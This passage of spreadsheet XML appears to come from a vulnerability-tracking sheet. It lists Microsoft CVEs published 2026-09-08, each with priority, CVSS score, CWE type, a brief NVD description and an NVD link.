      <c r="G286" s="5" t="inlineStr"/>
      <c r="H286" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I286" s="5" t="inlineStr"/>
      <c r="J286" s="5" t="inlineStr"/>
      <c r="K286" s="5" t="inlineStr"/>
      <c r="L286" s="5" t="inlineStr"/>
      <c r="M286" s="5" t="inlineStr"/>
      <c r="N286" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O286" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P286" s="5" t="inlineStr"/>
      <c r="Q286" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R286" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DNS allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S286" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69551</t>
        </is>
      </c>
    </row>
    <row r="287">
      <c r="A287" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B287" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C287" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69556</t>
        </is>
      </c>
      <c r="D287" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E287" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F287" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G287" s="5" t="inlineStr"/>
      <c r="H287" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I287" s="5" t="inlineStr"/>
      <c r="J287" s="5" t="inlineStr"/>
      <c r="K287" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L287" s="5" t="inlineStr"/>
      <c r="M287" s="5" t="inlineStr"/>
      <c r="N287" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O287" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P287" s="5" t="inlineStr"/>
      <c r="Q287" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R287" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S287" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69556</t>
        </is>
      </c>
    </row>
    <row r="288">
      <c r="A288" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B288" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C288" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69598</t>
        </is>
      </c>
      <c r="D288" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E288" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F288" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G288" s="5" t="inlineStr"/>
      <c r="H288" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I288" s="5" t="inlineStr"/>
      <c r="J288" s="5" t="inlineStr"/>
      <c r="K288" s="5" t="inlineStr"/>
      <c r="L288" s="5" t="inlineStr"/>
      <c r="M288" s="5" t="inlineStr"/>
      <c r="N288" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O288" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P288" s="5" t="inlineStr"/>
      <c r="Q288" s="5" t="inlineStr">
        <is>
          <t>CWE-131</t>
        </is>
      </c>
      <c r="R288" s="5" t="inlineStr">
        <is>
          <t>Incorrect calculation of buffer size in Windows iSCSI allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S288" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69598</t>
        </is>
      </c>
    </row>
    <row r="289">
      <c r="A289" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B289" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C289" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69601</t>
        </is>
      </c>
      <c r="D289" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E289" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F289" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G289" s="5" t="inlineStr"/>
      <c r="H289" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I289" s="5" t="inlineStr"/>
      <c r="J289" s="5" t="inlineStr"/>
      <c r="K289" s="5" t="inlineStr"/>
      <c r="L289" s="5" t="inlineStr"/>
      <c r="M289" s="5" t="inlineStr"/>
      <c r="N289" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O289" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P289" s="5" t="inlineStr"/>
      <c r="Q289" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R289" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S289" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69601</t>
        </is>
      </c>
    </row>
    <row r="290">
      <c r="A290" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B290" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C290" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69603</t>
        </is>
      </c>
      <c r="D290" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E290" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F290" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G290" s="5" t="inlineStr"/>
      <c r="H290" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I290" s="5" t="inlineStr"/>
      <c r="J290" s="5" t="inlineStr"/>
      <c r="K290" s="5" t="inlineStr"/>
      <c r="L290" s="5" t="inlineStr"/>
      <c r="M290" s="5" t="inlineStr"/>
      <c r="N290" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O290" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P290" s="5" t="inlineStr"/>
      <c r="Q290" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R290" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Hyper-V allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S290" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69603</t>
        </is>
      </c>
    </row>
    <row r="291">
      <c r="A291" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B291" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C291" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69614</t>
        </is>
      </c>
      <c r="D291" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E291" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F291" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G291" s="5" t="inlineStr"/>
      <c r="H291" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I291" s="5" t="inlineStr"/>
      <c r="J291" s="5" t="inlineStr"/>
      <c r="K291" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L291" s="5" t="inlineStr"/>
      <c r="M291" s="5" t="inlineStr"/>
      <c r="N291" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O291" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P291" s="5" t="inlineStr"/>
      <c r="Q291" s="5" t="inlineStr">
        <is>
          <t>CWE-121, CWE-20</t>
        </is>
      </c>
      <c r="R291" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Access allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S291" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69614</t>
        </is>
      </c>
    </row>
    <row r="292">
      <c r="A292" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B292" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C292" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69628</t>
        </is>
      </c>
      <c r="D292" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E292" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F292" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G292" s="5" t="inlineStr"/>
      <c r="H292" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I292" s="5" t="inlineStr"/>
      <c r="J292" s="5" t="inlineStr"/>
      <c r="K292" s="5" t="inlineStr"/>
      <c r="L292" s="5" t="inlineStr"/>
      <c r="M292" s="5" t="inlineStr"/>
      <c r="N292" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O292" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P292" s="5" t="inlineStr"/>
      <c r="Q292" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R292" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows iSCSI allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S292" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69628</t>
        </is>
      </c>
    </row>
    <row r="293">
      <c r="A293" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B293" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C293" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69629</t>
        </is>
      </c>
      <c r="D293" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E293" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F293" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G293" s="5" t="inlineStr"/>
      <c r="H293" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I293" s="5" t="inlineStr"/>
      <c r="J293" s="5" t="inlineStr"/>
      <c r="K293" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:outlook</t>
        </is>
      </c>
      <c r="L293" s="5" t="inlineStr"/>
      <c r="M293" s="5" t="inlineStr"/>
      <c r="N293" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O293" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P293" s="5" t="inlineStr"/>
      <c r="Q293" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R293" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Outlook allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S293" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69629</t>
        </is>
      </c>
    </row>
    <row r="294">
      <c r="A294" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B294" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C294" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69632</t>
        </is>
      </c>
      <c r="D294" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E294" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F294" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G294" s="5" t="inlineStr"/>
      <c r="H294" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I294" s="5" t="inlineStr"/>
      <c r="J294" s="5" t="inlineStr"/>
      <c r="K294" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t>
        </is>
      </c>
      <c r="L294" s="5" t="inlineStr"/>
      <c r="M294" s="5" t="inlineStr"/>
      <c r="N294" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O294" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P294" s="5" t="inlineStr"/>
      <c r="Q294" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R294" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S294" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69632</t>
        </is>
      </c>
    </row>
    <row r="295">
      <c r="A295" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B295" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C295" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69649</t>
        </is>
      </c>
      <c r="D295" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E295" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F295" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G295" s="5" t="inlineStr"/>
      <c r="H295" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I295" s="5" t="inlineStr"/>
      <c r="J295" s="5" t="inlineStr"/>
      <c r="K295" s="5" t="inlineStr"/>
      <c r="L295" s="5" t="inlineStr"/>
      <c r="M295" s="5" t="inlineStr"/>
      <c r="N295" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O295" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P295" s="5" t="inlineStr"/>
      <c r="Q295" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R295" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Raw Image Extension allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S295" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69649</t>
        </is>
      </c>
    </row>
    <row r="296">
      <c r="A296" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B296" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C296" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69669</t>
        </is>
      </c>
      <c r="D296" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E296" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F296" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G296" s="5" t="inlineStr"/>
      <c r="H296" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I296" s="5" t="inlineStr"/>
      <c r="J296" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K2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6" s="5" t="inlineStr"/>
      <c r="M296" s="5" t="inlineStr"/>
      <c r="N296" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O296" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P296" s="5" t="inlineStr"/>
      <c r="Q296" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R296" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Kernel allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S296" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69669</t>
        </is>
      </c>
    </row>
    <row r="297">
      <c r="A297" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B297" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C297" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69671</t>
        </is>
      </c>
      <c r="D297" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E297" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F297" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G297" s="5" t="inlineStr"/>
      <c r="H297" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I297" s="5" t="inlineStr"/>
      <c r="J297" s="5" t="inlineStr"/>
      <c r="K297" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L297" s="5" t="inlineStr"/>
      <c r="M297" s="5" t="inlineStr"/>
      <c r="N297" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O297" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P297" s="5" t="inlineStr"/>
      <c r="Q297" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R297" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S297" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69671</t>
        </is>
      </c>
    </row>
    <row r="298">
      <c r="A298" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B298" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C298" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69676</t>
        </is>
      </c>
      <c r="D298" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E298" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F298" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G298" s="5" t="inlineStr"/>
      <c r="H298" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="I298" s="5" t="inlineStr"/>
      <c r="J298" s="5" t="inlineStr"/>
      <c r="K298" s="5" t="inlineStr"/>
      <c r="L298" s="5" t="inlineStr"/>
      <c r="M298" s="5" t="inlineStr"/>
      <c r="N298" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O298" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P298" s="5" t="inlineStr"/>
      <c r="Q298" s="5" t="inlineStr">
        <is>
          <t>CWE-294</t>
        </is>
      </c>
      <c r="R298" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by capture-replay in Windows Kerberos allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69676</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69678</t>
        </is>
      </c>
      <c r="D299" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E299" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F299" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr"/>
      <c r="K299" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:powerpoint</t>
        </is>
      </c>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr"/>
      <c r="Q299" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>Use after free in Microsoft Office PowerPoint allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69678</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69686</t>
        </is>
      </c>
      <c r="D300" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E300" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F300" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr"/>
      <c r="K300" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr"/>
      <c r="Q300" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69686</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69712</t>
        </is>
      </c>
      <c r="D301" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E301" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F301" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr"/>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr"/>
      <c r="Q301" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Key Distribution Center allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69712</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69716</t>
        </is>
      </c>
      <c r="D302" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E302" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F302" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint</t>
        </is>
      </c>
      <c r="K302" s="5" t="inlineStr">
        <is>
          <t>microsoft:sharepoint_server</t>
        </is>
      </c>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr"/>
      <c r="Q302" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an sql command ('sql injection') in Microsoft Office SharePoint allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69716</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69722</t>
        </is>
      </c>
      <c r="D303" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E303" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F303" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr"/>
      <c r="K303" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr"/>
      <c r="Q303" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69722</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69724</t>
        </is>
      </c>
      <c r="D304" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E304" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
